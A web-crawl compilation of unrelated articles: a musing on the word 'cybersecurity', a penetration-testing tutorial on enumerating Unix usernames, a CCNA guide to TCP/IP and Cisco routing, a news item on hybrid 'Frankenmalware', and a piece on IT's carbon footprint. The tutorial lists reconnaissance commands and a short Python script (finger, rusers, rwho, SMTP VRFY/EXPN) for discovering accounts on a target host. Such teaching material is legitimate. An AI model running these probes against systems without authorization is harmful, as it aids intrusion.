- SMTP TLS: All About Secure Email Delivery over TLS
- How to Tell Who Supports TLS for Email Transmission
- What level of SSL or TLS is required for HIPAA? | <urn:uuid:83e890df-3624-4edf-a555-6fb2e0c257e9> | CC-MAIN-2017-04 | https://luxsci.com/blog/ssl-versus-tls-whats-the-difference.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00517-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939096 | 2,381 | 3.390625 | 3 |
I’m feeling the walls of our linguistic purity come crashing down, battered by the waves of language evolution. In short, I’m ready to acknowledge an increasingly popular usage, and start using the trendy term ‘Cybersecurity’.
Such terminological transitions are no new thing in a space that could still legitimately be labeled as ‘computer security’. Working for a beltway bandit in 1995, I have vivid memories of a passionate beer-fueled discussion over the relatively new term ‘information security’, and whether that was an appropriate designation for an increasingly significant discipline, or just a pretentious and hyped new label.
Since that time, my friends in the military-industrial ghetto have recharacterized the holistic approach to ensuring that nothing bad happens to stored communications as ‘information assurance,’ and arguably arriving several years later, the commercial world has an essentially equal set of expectations for the term ‘information risk management’.
Meanwhile, Gartner is fielding a record number of calls on ‘CYBER’ security topics. Unsurprisingly, the answers vary when we try to dig deeper into the underlying questions. When I asked one Cybersecurity vendor just what they thought the term meant, they explained that it referred to ‘computer security–with the Internet’. Given that I’ve been on the Internet, and involved in security topics, since 1987, I just didn’t find that a satisfactory answer at the time. Yet, the more I think about it, the more it rings true.
In today’s parlance, ‘cyber’ clearly equates to ‘digital’. With all due respect to Norbert Wiener, and his groundbreaking work in the field of cybernetics, a prefix inspired by the Greek word for ‘steersman or rudder’ has been hijacked by 30 years of speculative fiction, losing its association with the esoteric concepts of ‘control’ and ‘systems’.
For the overwhelming majority of people, ‘cyberspace’ refers to the Internet, and by extension, anything with an IP address. Cybersecurity essentially applies to the realm of all that is digital, be it an office computer, a personal tablet, operational technology, or next year’s digital refrigerator. While the term certainly implies the role of Internet connectivity, that distinction is becoming less significant for the inhabitants of an ‘Internet of things’.
The good news is that we no longer have to be worried about paper. The self-identified practitioners of ‘Information Security’ have spent the last 20 years grappling with the dilemma of the printed page, and to a lesser degree, with the implications of human memory. Cybersecurity means freedom from the thankless task of trying to protect information outside of the digital realm.
Computer Security is dead; long live computer security. I wonder what they will come up with next.
One of the first activities while conducting a penetration test in Unix environments is to perform user enumeration in order to discover valid usernames. In this article we will examine how we can manually discover usernames based on the services that are running.
Let's say that we have performed a port scan with Nmap on our target host and have discovered that the finger daemon is running on port 79.
We can use the finger command in order to enumerate the users on this remote machine. For example, if we execute the command finger @host we will get the following output.
As you can see, the root user is the only account that is logged on the remote host. Now that we have a specific username we can use it to obtain more information about this user with the command finger root@host.
As the image indicates, the finger command obtained information about the name, the home directory, login name and shell. We can also see that the root user doesn't have a .plan file.
Another effective use of the finger command is when you use it with the following syntax: finger user@host
This specific command will enumerate all user accounts that contain the string user. Alternatively, you can use other words instead of user, like admin, account and project.
Older versions of Solaris that run the finger daemon are affected by enumeration bugs. For example, you can run the command finger 0@host and it will enumerate all users with an empty GCOS field in the password file. Additionally, you can run finger ‘a b c d e f g h’@host and it will enumerate all users on the remote target.
In SunOS there are RPC services that also allow user enumeration. For example, the command rusers will return a list of the users that are logged into machines on the local network. Alternatively, if you are looking for the list on a specific host you can run rusers -al host.
Another option is the rwho command, which can also be used to enumerate network users. All the systems that are running the rwhod daemon will respond, producing output that lists the users currently logged in to those systems. This service runs on UDP port 513.
If you discover a host that is running an SMTP service (port 25) you can also use it for username enumeration. We can connect to the mail server through telnet and then execute the command help in order to see the available commands.
As you can see from the image above there are plenty of commands, but the ones we need for the discovery of valid usernames are VRFY and EXPN.
The image above indicates that we have successfully verified the existence of two users: root and admin.
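The same probing can be scripted; here is a hedged sketch using Python's standard smtplib (the target address and wordlist are placeholders, and many hardened servers disable or give fake answers to VRFY):

```python
import smtplib

target = "192.0.2.10"                      # placeholder mail server
candidates = ["root", "admin", "test", "backup"]

server = smtplib.SMTP(target, 25, timeout=10)
for user in candidates:
    code, message = server.verify(user)    # issues the SMTP VRFY command
    # 250/251 confirm the address; 252 means "cannot verify", i.e. ambiguous.
    if code in (250, 251):
        print(f"Valid user: {user} -> {message.decode(errors='replace')}")
server.quit()
```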
In production systems it is almost impossible to find any of these services running, due to this information leakage. However, many Linux distributions include these daemons as part of their default installation.
Nowadays this process can be done automatically through the Nmap scripting engine, but it is good to know how to manually discover usernames in Unix systems as well. Also, many commercial certifications still require you to know how to enumerate users with these commands.
In preparation of your CCNA exam, we want to make sure we cover the various concepts that we could see on your Cisco CCNA exam. So to assist you, below we will discuss the foundation of the CCNA exam; Cisco TCP/IP. As you progress through your CCNA exam studies, I am sure with repetition you will find this topic becomes easier. So even though it may be a difficult concept and confusing at first, keep at it as no one said getting your Cisco certification would be easy!
In the two decades since their invention, the heterogeneity of networks has expanded further with the deployment of Ethernet, Token Ring, Fiber Distributed Data Interface (FDDI), X.25, Frame Relay, Switched Multimegabit Data Service (SMDS), Integrated Services Digital Network (ISDN), and most recently, Asynchronous Transfer Mode (ATM). The Internet protocols are the best proven approach to internetworking this diverse range of LAN and WAN technologies.
The Internet Protocol suite includes not only lower-level specifications, such as Transmission Control Protocol (TCP) and Internet Protocol (IP), but specifications for such common applications as electronic mail, terminal emulation, and file transfer. Figure 1 shows the TCP/IP protocol suite in relation to the OSI Reference model. Figure 2 shows some of the important Internet protocols and their relationship to the OSI Reference Model. For information on the OSI Reference model and the role of each layer, please refer to the document Internetworking Basics.
The Internet protocols are the most widely implemented multivendor protocol suite in use today. Support for at least part of the Internet Protocol suite is available from virtually every computer vendor.
This section describes technical aspects of TCP, IP, related protocols, and the environments in which these protocols operate. Because the primary focus of this document is routing (a layer 3 function), the discussion of TCP (a layer 4 protocol) will be relatively brief.
TCP is a connection-oriented transport protocol that sends data as an unstructured stream of bytes. By using sequence numbers and acknowledgment messages, TCP can provide a sending node with delivery information about packets transmitted to a destination node. Where data has been lost in transit from source to destination, TCP can retransmit the data until either a timeout condition is reached or until successful delivery has been achieved. TCP can also recognize duplicate messages and will discard them appropriately. If the sending computer is transmitting too fast for the receiving computer, TCP can employ flow control mechanisms to slow data transfer. TCP also communicates delivery information to the upper-layer protocols and applications it supports. All these characteristics make TCP an end-to-end reliable transport protocol. TCP is specified in RFC 793.
Figure 1 TCP/IP Protocol Suite in Relation to the OSI Reference Model
Figure 2 Important Internet Protocols in Relation to the OSI Reference Model
Refer to the TCP section of Internet Protocols for more information.
IP is the primary Layer 3 protocol in the Internet suite. In addition to internetwork routing, IP provides error reporting and fragmentation and reassembly of information units called datagrams for transmission over networks with different maximum data unit sizes. IP represents the heart of the Internet Protocol suite.
Note: The term IP in the section refers to IPv4 unless otherwise stated explicitly.
IP addresses are globally unique, 32-bit numbers assigned by the Network Information Center. Globally unique addresses permit IP networks anywhere in the world to communicate with each other.
An IP address is divided into two parts. The first part designates the network address while the second part designates the host address.
The IP address space is divided into different network classes. Class A networks are intended mainly for use with a few very large networks, because they provide only 8 bits for the network address field. Class B networks allocate 16 bits, and Class C networks allocate 24 bits for the network address field. Class C networks only provide 8 bits for the host field, however, so the number of hosts per network may be a limiting factor. In all three cases, the leftmost bit(s) indicate the network class. IP addresses are written in dotted decimal format; for example, 34.0.0.1. Figure 3 shows the address formats for Class A, B, and C IP networks.
Figure 3 Address Formats for Class A, B, and C IP Networks
IP networks also can be divided into smaller units called subnetworks or “subnets.” Subnets provide extra flexibility for the network administrator. For example, assume that a network has been assigned a Class A address and all the nodes on the network use a Class A address. Further assume that the dotted decimal representation of this network's address is 34.0.0.0. (All zeros in the host field of an address specify the entire network.) The administrator can subdivide the network using subnetting. This is done by “borrowing” bits from the host portion of the address and using them as a subnet field, as depicted in Figure 4.
Figure 4 “Borrowing” Bits
If the network administrator has chosen to use 8 bits of subnetting, the second octet of a Class A IP address provides the subnet number. In our example, address 34.1.0.0 refers to network 34, subnet 1; address 34.2.0.0 refers to network 34, subnet 2, and so on.
The number of bits that can be borrowed for the subnet address varies. To specify how many bits are used to represent the network and the subnet portion of the address, IP provides subnet masks. Subnet masks use the same format and representation technique as IP addresses. Subnet masks have ones in all bits except those that specify the host field. For example, the subnet mask that specifies 8 bits of subnetting for Class A address 34.0.0.0 is 255.255.0.0. The subnet mask that specifies 16 bits of subnetting for Class A address 34.0.0.0 is 255.255.255.0. Both of these subnet masks are pictured in Figure 5. Subnet masks can be passed through a network on demand so that new nodes can learn how many bits of subnetting are being used on their network.
Figure 5 Subnet Masks
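A quick sketch of the masking arithmetic using Python's ipaddress module (the host address is illustrative): ANDing an address with the subnet mask yields the network-plus-subnet portion, which is exactly what Figure 5 depicts.

```python
import ipaddress

addr = ipaddress.ip_address("34.1.0.25")    # network 34, subnet 1, host 25
mask = ipaddress.ip_address("255.255.0.0")  # Class A with 8 bits of subnetting

print(ipaddress.ip_address(int(addr) & int(mask)))  # 34.1.0.0

# The same computation via an interface object:
iface = ipaddress.ip_interface("34.1.0.25/255.255.0.0")
print(iface.network)                                # 34.1.0.0/16
```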
Traditionally, all subnets of the same network number used the same subnet mask. In other words, a network manager would choose an eight-bit mask for all subnets in the network. This strategy is easy to manage for both network administrators and routing protocols. However, this practice wastes address space in some networks. Some subnets have many hosts and some have only a few, but each consumes an entire subnet number. Serial lines are the most extreme example, because each has only two hosts that can be connected via a serial line subnet.
As IP subnets have grown, administrators have looked for ways to use their address space more efficiently. One of the techniques that has resulted is called Variable Length Subnet Masks (VLSM). With VLSM, a network administrator can use a long mask on subnets with few hosts and a short mask on subnets with many hosts. However, this technique is more complex than using a single mask size throughout, and addresses must be assigned carefully.
Of course in order to use VLSM, a network administrator must use a routing protocol that supports it. Cisco routers support VLSM with Open Shortest Path First (OSPF), Integrated Intermediate System to Intermediate System (Integrated IS-IS), Enhanced Interior Gateway Routing Protocol (Enhanced IGRP), and static routing. Refer to IP Addressing and Subnetting for New Users for more information about IP addressing and subnetting.
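A minimal sketch of the VLSM idea with the same module (the 192.168.1.0/24 block is an invented example):

import ipaddress

block  = ipaddress.ip_network("192.168.1.0/24")
lan    = ipaddress.ip_network("192.168.1.0/25")    # short mask: a subnet with many hosts
serial = ipaddress.ip_network("192.168.1.128/30")  # long mask: a two-host serial link
print(lan.num_addresses - 2)     # 126 usable host addresses
print(serial.num_addresses - 2)  # 2 usable host addresses
print(lan.subnet_of(block), serial.subnet_of(block))  # True True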
On some media, such as IEEE 802 LANs, IP addresses are dynamically discovered through the use of two other members of the Internet protocol suite: Address Resolution Protocol (ARP) and Reverse Address Resolution Protocol (RARP). ARP uses broadcast messages to determine the hardware (MAC layer) address corresponding to a particular network-layer address. ARP is sufficiently generic to allow use of IP with virtually any type of underlying media access mechanism. RARP uses broadcast messages to determine the network-layer address associated with a particular hardware address. RARP is especially important to diskless nodes, for which network-layer addresses usually are unknown at boot time.
Routing in IP Environments
An “internet” is a group of interconnected networks. The Internet, on the other hand, is the collection of networks that permits communication between most research institutions, universities, and many other organizations around the world. Routers within the Internet are organized hierarchically. Some routers are used to move information through one particular group of networks under the same administrative authority and control. (Such an entity is called an autonomous system.) Routers used for information exchange within autonomous systems are called interior routers, and they use a variety of interior gateway protocols (IGPs) to accomplish this end. Routers that move information between autonomous systems are called exterior routers; they use the Exterior Gateway Protocol (EGP) or Border Gateway Protocol (BGP). Figure 6 shows the Internet architecture.
Figure 6 Representation of the Internet Architecture
Routing protocols used with IP are dynamic in nature. Dynamic routing requires the software in the routing devices to calculate routes. Dynamic routing algorithms adapt to changes in the network and automatically select the best routes. In contrast with dynamic routing, static routing calls for routes to be established by the network administrator. Static routes do not change until the network administrator changes them.
IP routing tables consist of destination address/next hop pairs. This sample routing table from a Cisco router shows that the first entry is interpreted as meaning “to get to network 34.1.0.0 (subnet 1 on network 34), send packets out the directly connected interface Serial0”:
R6-2500# show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route
Gateway of last resort is not set
34.0.0.0/16 is subnetted, 1 subnets
C 34.1.0.0 is directly connected, Serial0
As we have seen, IP routing specifies that IP datagrams travel through an internetwork one router hop at a time. The entire route is not known at the outset of the journey. Instead, at each stop, the next router hop is determined by matching the destination address within the datagram with an entry in the current node's routing table. Each node's involvement in the routing process consists only of forwarding packets based on internal information. IP does not provide for error reporting back to the source when routing anomalies occur. That task is left to another Internet protocol, the Internet Control Message Protocol (ICMP).
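A minimal sketch of that per-hop lookup (the table entries are invented example values; where several entries match, the most specific prefix wins):

import ipaddress

routing_table = [
    (ipaddress.ip_network("34.1.0.0/16"), "Serial0"),
    (ipaddress.ip_network("34.0.0.0/8"), "Ethernet0"),
    (ipaddress.ip_network("0.0.0.0/0"), "gateway-of-last-resort"),
]

def next_hop(destination: str) -> str:
    dest = ipaddress.ip_address(destination)
    matches = [(net, hop) for net, hop in routing_table if dest in net]
    return max(matches, key=lambda m: m[0].prefixlen)[1]  # longest prefix wins

print(next_hop("34.1.2.3"))  # Serial0
print(next_hop("34.9.0.1"))  # Ethernet0
print(next_hop("8.8.8.8"))   # gateway-of-last-resort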
ICMP performs a number of tasks within an IP internetwork. In addition to the principal reason for which it was created (reporting routing failures back to the source), ICMP provides a method for testing node reachability across an internet (the ICMP Echo and Reply messages), a method for increasing routing efficiency (the ICMP Redirect message), a method for informing sources that a datagram has exceeded its allocated time to exist within an internet (the ICMP Time Exceeded message), and other helpful messages. All in all, ICMP is an integral part of any IP implementation, particularly those that run in routers. See the Related Information section of this document for more information on ICMP.
Interior Routing Protocols
Interior gateway protocols (IGPs) operate within autonomous systems. The following sections provide brief descriptions of several IGPs that are currently popular in TCP/IP networks. For additional information on these protocols, please refer to the links in the Related Information section below.
A discussion of routing protocols within an IP environment must begin with the Routing Information Protocol (RIP). RIP was developed by Xerox Corporation in the early 1980s for use in Xerox Network Systems (XNS) networks. Today, many PC networks use routing protocols based on RIP.
RIP works well in small environments but has serious limitations when used in larger internetworks. For example, RIP limits the number of router hops between any two hosts in an internet to 15; a hop count of 16 is treated as unreachable. RIP is also slow to converge, meaning that it takes a relatively long time for network changes to become known to all routers. Finally, RIP determines the best path through an internet by looking only at the number of hops between the two end nodes. This technique ignores differences in line speed, line utilization, and all other metrics, many of which can be important factors in choosing the best path between two nodes. For this reason, many companies with large internetworks are migrating away from RIP to more sophisticated routing protocols.
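To make the hop-count metric concrete, here is a toy distance-vector update in the spirit of RIP (a sketch only, not the real protocol):

INFINITY = 16  # in RIP, a hop count of 16 means "unreachable"

def rip_update(my_routes, neighbor, advertised):
    """Merge a neighbor's advertised hop counts into our routing table."""
    for dest, hops in advertised.items():
        candidate = min(hops + 1, INFINITY)  # one extra hop to reach the neighbor
        current = my_routes.get(dest, (INFINITY, None))[0]
        if candidate < current:
            my_routes[dest] = (candidate, neighbor)
    return my_routes

table = {"net-A": (2, "r1")}
table = rip_update(table, "r2", {"net-A": 4, "net-B": 1, "net-C": 15})
print(table)  # net-A stays via r1; net-B installed via r2; net-C would be
              # 16 hops, i.e. unreachable, so it is not installed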
With the creation of the Interior Gateway Routing Protocol (IGRP) in the early 1980s, Cisco Systems was the first company to solve the problems associated with using RIP to route datagrams between interior routers. IGRP determines the best path through an internet by examining the bandwidth and delay of the networks between routers. IGRP converges faster than RIP, thereby avoiding the routing loops caused by disagreement over the next routing hop to be taken. Further, IGRP does not share RIP's hop count limitation. As a result of these and other improvements over RIP, IGRP enabled many large, complex, topologically diverse internetworks to be deployed.
Cisco has enhanced IGRP to handle the increasingly large, mission-critical networks being designed today. This enhanced version of IGRP is called Enhanced IGRP. Enhanced IGRP combines the ease of use of traditional distance vector routing protocols with the fast rerouting capabilities of the newer link state routing protocols.
Enhanced IGRP consumes significantly less bandwidth than IGRP because it is able to limit the exchange of routing information to include only the changed information. In addition, Enhanced IGRP is capable of handling AppleTalk and Novell IPX routing information, as well as IP routing information.
OSPF was developed by the Internet Engineering Task Force (IETF) as a replacement for RIP. OSPF is based on work started by John McQuillan in the late 1970s and continued by Radia Perlman and Digital Equipment Corporation (DEC) in the mid-1980s. Every major IP routing vendor supports OSPF.
OSPF is an intradomain, link state, hierarchical routing protocol. OSPF supports hierarchical routing within an autonomous system. Autonomous systems can be divided into routing areas. A routing area is typically a collection of one or more subnets that are closely related. All areas must connect to the backbone area.
OSPF provides fast rerouting and supports variable length subnet masks.
ISO 10589 (IS-IS) is an intradomain, link state, hierarchical routing protocol used as the DECnet Phase V routing algorithm. It is similar in many ways to OSPF. IS-IS can operate over a variety of subnetworks, including broadcast LANs, WANs, and point-to-point links.
Integrated IS-IS is an implementation of IS-IS for more than just OSI protocols. Today, Integrated IS-IS supports both OSI and IP protocols.
Like all integrated routing protocols, Integrated IS-IS calls for all routers to run a single routing algorithm. Link state advertisements sent by routers running Integrated IS-IS include all destinations running either IP or OSI network-layer protocols. Protocols such as ARP and ICMP for IP and End System-to-Intermediate System (ES-IS) for OSI must still be supported by routers running Integrated IS-IS.
Exterior Routing Protocols
EGPs provide routing between autonomous systems. The two most popular EGPs in the TCP/IP community are discussed in this section.
The first widespread exterior routing protocol was the Exterior Gateway Protocol. EGP provides dynamic connectivity but assumes that all autonomous systems are connected in a tree topology. This was true in the early Internet but is no longer true.
Although EGP is a dynamic routing protocol, it uses a very simple design. It does not use metrics and therefore cannot make true intelligent routing decisions. EGP routing updates contain network reachability information. In other words, they specify that certain networks are reachable through certain routers. Because of its limitations with regard to today's complex internetworks, EGP is being phased out in favor of routing protocols such as BGP.
BGP represents an attempt to address the most serious of EGP's problems. Like EGP, BGP is an interdomain routing protocol created for use in the Internet core routers. Unlike EGP, BGP was designed to prevent routing loops in arbitrary topologies and to allow policy-based route selection.
BGP was co-authored by a Cisco founder, and Cisco continues to be very involved in BGP development. The latest revision of BGP, BGP4, was designed to handle the scaling problems of the growing Internet.
Cisco's TCP/IP Implementation
In addition to IP and TCP, the Cisco TCP/IP implementation supports ARP, RARP, ICMP, Proxy ARP (in which the router acts as an ARP server on behalf of another device), Echo, Discard, and Probe (an address resolution protocol developed by Hewlett-Packard Company and used on IEEE 802.3 networks). Cisco routers also can be configured to use the Domain Name System (DNS) when host name-to-address mappings are needed.
IP hosts need to know how to reach a router. There are several ways this can be done:
- Add a static route in the host pointing to a router.
- Run RIP or some other IGP on the host.
- Run the ICMP Router Discovery Protocol (IRDP) in the host.
- Run Proxy ARP on the router.
Cisco routers support all of these methods.
Cisco provides many TCP/IP value-added features that enhance applications availability and reduce the total cost of internetwork ownership. The most important of these features are described in the following section.
Most networks have reasonably straightforward access requirements. To address these requirements, Cisco implements access lists, a scheme that prevents certain packets from entering or leaving particular networks.
An access list is a sequential list of instructions to either permit or deny access through a router interface based on IP address or other criteria. For example, an access list could be created to deny access to a particular resource from all computers on one network segment but permit access from all other segments. Another access list could be used to permit TCP connections from any host on a local segment to any host in the Internet but to deny all connections from the Internet into the local net except for electronic mail connections to a particular designated mail host. Access lists are extremely flexible, powerful security measures and are available not only for IP, but for many other protocols supported by Cisco routers.
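The first-match-wins evaluation can be sketched as follows (the rules are invented; the trailing implicit deny mirrors real access-list behavior):

import ipaddress

acl = [
    ("deny",   ipaddress.ip_network("10.9.0.0/16"), None),  # block one segment entirely
    ("permit", ipaddress.ip_network("0.0.0.0/0"),   25),    # mail connections from anywhere
    ("permit", ipaddress.ip_network("10.0.0.0/8"),  None),  # all other internal traffic
]

def allowed(source: str, port: int) -> bool:
    addr = ipaddress.ip_address(source)
    for action, network, rule_port in acl:
        if addr in network and rule_port in (None, port):
            return action == "permit"  # first matching rule decides
    return False  # implicit deny at the end of every access list

print(allowed("10.9.1.1", 80))    # False: denied by the first rule
print(allowed("172.16.1.1", 25))  # True: mail is permitted
print(allowed("172.16.1.1", 80))  # False: falls through to the implicit deny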
Other access restrictions are provided by the Department of Defense-specified security extensions to IP. Cisco supports both the Basic and the Extended security options described in RFC 1108, the IP Security Option (IPSO). Support of both access lists and the IPSO makes Cisco a good choice for networks where security is an issue.
Cisco's TCP/IP implementation includes several schemes that allow foreign protocols to be tunneled through an IP network. Tunneling allows network administrators to extend the size of AppleTalk and Novell IPX networks beyond the size that their native protocols can handle.
The applications that use the TCP/IP protocol suite continue to evolve. The next set of applications on which a lot of work is being done include those that use video and audio information. Cisco continues to be actively involved with the Internet Engineering Task Force (IETF) in defining standards that will enable network administrators to add audio and video applications to their existing networks. Cisco supports the Protocol Independent Multicast (PIM) standard. In addition, Cisco's implementation provides interoperability with the MBONE, a research multicast backbone that exists today.
IP multicasting (the ability to send IP datagrams to multiple nodes in a logical group) is an important building block for applications such as video. Video teleconferencing, for example, requires the ability to send video information to multiple teleconference sites. If one IP multicast datagram containing video information can be sent to multiple teleconference sites, network bandwidth is saved and time synchronization is closer to optimal.
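As a rough sketch of the receiving side (the group address and port are invented; the standard library socket options shown are the usual way to join a group):

import socket
import struct

MCAST_GRP, MCAST_PORT = "224.1.1.1", 5007  # example multicast group

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", MCAST_PORT))

# Join the group: one datagram sent to 224.1.1.1 now reaches this node and
# every other member, instead of one unicast copy per receiver.
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

print(sock.recvfrom(1024))  # blocks until a multicast datagram arrives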
Suppressing Network Information
In some cases, it may be useful to suppress information about certain networks. Cisco routers provide an extensive set of configuration options that allow an administrator to tailor the exchange of routing information within a particular routing protocol. Both incoming and outgoing information can be controlled using a set of commands designed for this purpose. For example, networks can be excluded from routing advertisements, routing updates can be prevented from reaching certain networks, and other similar actions can be taken.
In large networks, some routers and routing protocols are more reliable sources of routing information than others. Cisco IP routing software permits the reliability of information sources to be quantified by the network administrator with the administrative distance metric. When administrative distance is specified, the router can select between sources of routing information based on the reliability of the source. For example, if a router uses both IGRP and RIP, one might set the administrative distances to reflect greater confidence in the IGRP information. The router would then use IGRP information when available. If the source of IGRP information failed, the router automatically would use RIP information as a backup until the IGRP source became available again.
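A sketch of that selection logic, using Cisco's conventional default distances for these route sources:

ADMIN_DISTANCE = {"connected": 0, "static": 1, "igrp": 100, "rip": 120}

def best_route(candidates):
    """candidates: (protocol, next_hop) pairs offering the same destination."""
    return min(candidates, key=lambda c: ADMIN_DISTANCE[c[0]])

print(best_route([("rip", "10.0.0.2"), ("igrp", "10.0.0.9")]))  # IGRP wins: 100 < 120
print(best_route([("rip", "10.0.0.2")]))  # with the IGRP source gone, RIP is the backup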
Routing Protocol Redistribution
Translation between two environments using different routing protocols requires that routes generated by one protocol be redistributed into the second routing protocol environment. Route redistribution gives a company the ability to run different routing protocols in workgroups or areas where each is particularly effective. By not restricting customers to using only a single routing protocol, Cisco's route redistribution feature minimizes cost while maximizing technical advantage through diversity.
Cisco permits routing protocol redistribution between any of its supported routing protocols. Static route information can also be redistributed. Further, defaults can be assigned so that one routing protocol can use the same metric for all redistributed routes, thereby simplifying the routing redistribution mechanism.
Serverless Network Support
Cisco pioneered the mechanisms that allow network administrators to build serverless networks. Helper addresses, RARP, and BOOTP allow network administrators to place servers far away from the workstations that depend on them, thereby easing network design constraints.
Network Monitoring and Debugging
With today's complex, diverse network topologies, a router's ability to aid the monitoring and debugging process is critical. As the junction point for multiple segments, a router sees more of the complete network than most other devices. Many problems can be detected and/or solved using information that routinely passes through the router.
The Cisco IP routing implementation provides commands that display:
- The current state of the routing table, including the routing protocol that derived the route, the reliability of the source, the next IP address to send to, the router interface to use, whether the network is subnetted, whether the network in question is directly connected, and any routing metrics.
- The current state of the active routing protocol process, including its update interval, metric weights (if applicable), active networks for which the routing process is functioning, and routing information sources.
- The active accounting database, including the number of packets and bytes exchanged between particular sources and destinations.
- The contents of the IP cache, including the destination IP address, the interface through which that destination is reached, the encapsulation method used, and the hardware address found at that destination.
- IP-related interface parameters, including whether the interface and interface physical layer hardware are up, whether certain protocols (such as ICMP and Proxy ARP) are enabled, and the current security level.
- IP-related protocol statistics, including the number of packets and number of errors received and sent by the following protocols: IP, TCP, User Datagram Protocol (UDP), EGP, IGRP, Enhanced IGRP, OSPF, IS-IS, ARP, and Probe.
- Logging of all BGP, EGP, ICMP, IGRP, Enhanced IGRP, OSPF, IS-IS, RIP, TCP, and UDP transactions.
- The number of intermediate hops taken as a packet traverses the network.
- Reachability information between nodes.
We hope you found this Cisco certification article helpful. We pride ourselves on not only providing top notch Cisco CCNA exam information, but also providing you with the real world Cisco CCNA skills to advance in your networking career. | <urn:uuid:5f0fbea6-920f-4266-9199-bf9714205a5b> | CC-MAIN-2017-04 | https://www.certificationkits.com/cisco-tcpip/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00113-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9125 | 5,284 | 3.109375 | 3 |
Security researcher Loredana Botezatu claims that BitDefender has found “no less than 40,000 such malware symbioses out of a sample pool of 10 million files.” She believes that most of these have evolved naturally, but is concerned that they pose a new and worrying threat. “Although this happens unintentionally, the combined features from both pieces of malware will inflict a lot more damage than the creators of either piece of malware intended.”
The research describes a specific example it has found: the Rimecud worm infected with the Virtob file infector. It describes a potentially worrying scenario. “That PC faces a twofold malware with twice as many command and control servers to query for instructions; moreover, there are two backdoors open, two attack techniques active and various spreading methods put in place. Where one fails, the other succeeds.”
Furthermore, if you get one of these hybrids on your system, “you could be facing financial troubles, computer problems, identity theft, and a wave of spam thrown in as a random bonus,” Botezatu adds. “The advent of malware sandwiches throws a new twist into the world of malware. They spread more efficiently, and will become increasingly difficult to predict.”
Should we be afraid? Well, we need to look at this objectively. One effect highlighted by the report is that the new Frankenmalware changes the detection signature of both the original virus and the original worm, potentially defeating signature-based detection. But malware does this all the time, either by the application of a malware kit or sometimes via code within the malware itself. Anti-virus products are designed to detect such ‘new’ malware by their actions rather than their signatures.
So the bottom line is this. BitDefender’s research is accurate. What it dubs Frankenmalware is inevitable. Theoretically, everything it describes is a possible outcome. But while the evolution might be factual, the potential threat is hypothetical. Malware plus malware is still malware; neither more nor less. And the anti-malware industry, including BitDefender, is very good at controlling it. | <urn:uuid:fc2e625c-ba28-40e0-9321-42aec0d3339a> | CC-MAIN-2017-04 | https://www.infosecurity-magazine.com/news/viruses-and-worms-are-evolving-into-frankenmalware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00113-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932559 | 454 | 2.578125 | 3 |
IT in 2009: Greener Pastures?
Think of a data center. Picture rows upon rows of storage racks, all humming away in a warehouse somewhere. Now imagine how much energy is required to keep it running.
The IT industry is notorious for generating a massive carbon footprint. According to an article by Robert Petrocelli of the Computer Technology Review, a single rack of storage enclosures using 6 kilowatts generates 40 tons of carbon dioxide — as much as six 1999 Chevy Tahoe SUVs. Petrocelli added that “most storage systems represent the equivalent of perpetually idling an SUV in the garage on the off chance the owner might want to take a drive.”
Further, a report in The McKinsey Quarterly found that the increasing carbon footprint associated with information and communications technologies — everything from computers, data centers and networks to mobile phones and telecommunications systems — could make them the biggest source of greenhouse gas emissions by 2020. The report went on to say that “emissions from the manufacture and use of PCs alone will double over the next 12 years as middle-class buyers in emerging economies go digital.”
But there’s hope. New research — also presented in the McKinsey Quarterly article — suggests these very same technologies can be used to make the world economy more energy and carbon efficient. The study found that such technologies could eliminate nearly 8 metric gigatons of greenhouse gas emissions annually by 2020, which translates to five times the estimated emissions from these technologies.
OK, you might say. But how?
The McKinsey report took a look at the role of technology in five main categories: buildings, power, transport, manufacturing and telecommuting. It then identified areas of savings within each sector and added them all up.
For example, in buildings, more sophisticated technology can monitor lighting, heating and ventilation systems to save an estimated 1.68 metric gigatons of global emissions a year, according to the research.
In the manufacturing industry, “smart controls can make motor systems in factories more efficient,” according to the report. “The use of information and communications technologies to optimize the energy efficiency of motors in China’s plants, for example, could cut emissions by 200 metric megatons a year, as much as the Netherlands produces today.”
In the power sector, the article suggests using sensors in grids to monitor distribution more efficiently. “One grid in India that used information and communications technologies to monitor electricity flows reduced its losses from the transmission and distribution of power by 15 percent,” the authors wrote.
Finally, using technology to manage truck logistics and promote collaboration could reduce emissions globally, the report stated.
When it comes to IT infrastructure itself, there are additional things that companies can do to “green” their businesses. Petrocelli cites an August 2007 EPA report that states the energy consumed by U.S. data centers alone will account for a whopping 2.5 percent of the nation’s total energy consumption in the next five years. So clearly, starting with data centers is probably our best bet.
That said, Petrocelli offered a few options. One is the use of storage virtualization applications that permit aggregation of disparate systems into a universally accessible pool. Data deduplication and wire-speed compression applications are another option, as they can reduce the amount of overall data to be stored. A final suggestion is the implementation of massive array of idle disks (MAID) devices that ultimately can reduce the electrical and cooling requirements for storage. However, Petrocelli warned that MAID devices only work when the underlying on-disk data requirements are compatible.
OK, so IT as an industry has the potential to be very environmentally friendly, you might say. But what does this have to do with me?
“If governments introduce a price on carbon emissions or if energy prices rise (or both), the increased costs of production could be passed on to buyers,” the McKinsey article states.
